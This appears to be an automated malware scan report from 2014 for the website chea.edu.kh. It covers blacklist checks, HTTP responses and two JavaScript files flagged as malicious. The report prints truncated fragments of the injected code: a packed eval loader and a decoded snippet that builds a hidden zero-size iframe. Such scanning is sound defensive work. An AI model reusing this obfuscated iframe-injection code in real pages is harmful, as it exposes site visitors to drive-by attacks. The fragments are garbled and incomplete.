Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chea.edu.kh
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chea.edu.kh/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chea.edu.kh/ | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 20:23:19 GMT Location: http://www.chea.edu.kh/cheakhm/ Server: Apache/2.2.3 (CentOS) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.3 X-Powered-By: PleskLin | clean |
http://www.chea.edu.kh/cheakhm/ | 200 OK Content-Length: 56699 Content-Type: text/html | clean |
http://www.chea.edu.kh/cheakhm/templates/it_tribune/js/mootools.php | 500 Can't connect to www.chea.edu.kh:80 Content-Length: 190 Content-Type: text/plain | clean |
http://www.chea.edu.kh/test404page.js | 500 Can't connect to www.chea.edu.kh:80 Content-Length: 190 Content-Type: text/plain | clean |
http://chea.edu.kh/cheakhm/templates/it_tribune/js/ice-menu.js | 200 OK Content-Length: 19392 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('A 2z=D 2A({2B:2C,4:{U:"2Z",2D:"30",R:"10 1l 18",Y:31,1m:1n.32.33.34,2E:2i,2F:1J,2G:1J,O:"Z",7:{x:"P",y:"V"},1s:{x:0,y:0},1c:{x:0,y:0},G:35,1d:19,1g:19,1R:19,36:1J},1a:D if(f)e(s);} Antivirus reports:
| ||
http://chea.edu.kh/cheakhm/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.chea.edu.kh/cheakhm/plugins/content/plugin_besps/besps.js | 200 OK Content-Length: 12951 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function besps_slideshow(besps_slideid,besps_ftim,besps_stim,besps_steps,besps_startwhen,besps_emax,besps_caps,besps_preload){ var self = this; var slideid=besps_slideid; var ftim=besps_ftim; var stim=besps_stim; var steps=besps_steps; var startwhen=besps_startwhen; var emax=besps_emax; var preload=besps_preload; var stopit=1; var startim=1; var u=0; var parr = new Array(); var ptofade,pnext,factor,mytimeout; var caps=besps_c if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chea.edu.kh
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 20:23:19 GMT
Location: http://www.chea.edu.kh/cheakhm/
Server: Apache/2.2.3 (CentOS)
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.3
X-Powered-By: PleskLin
...0 bytes of data.
GET / HTTP/1.1
Host: chea.edu.kh
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 20:23:19 GMT
Location: http://www.chea.edu.kh/cheakhm/
Server: Apache/2.2.3 (CentOS)
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.3
X-Powered-By: PleskLin
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chea.edu.kh
Referer: http://www.google.com/search?q=chea.edu.kh
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chea.edu.kh
Referer: http://www.google.com/search?q=chea.edu.kh
Result:
The result is similar to the first query. There are no suspicious redirects found.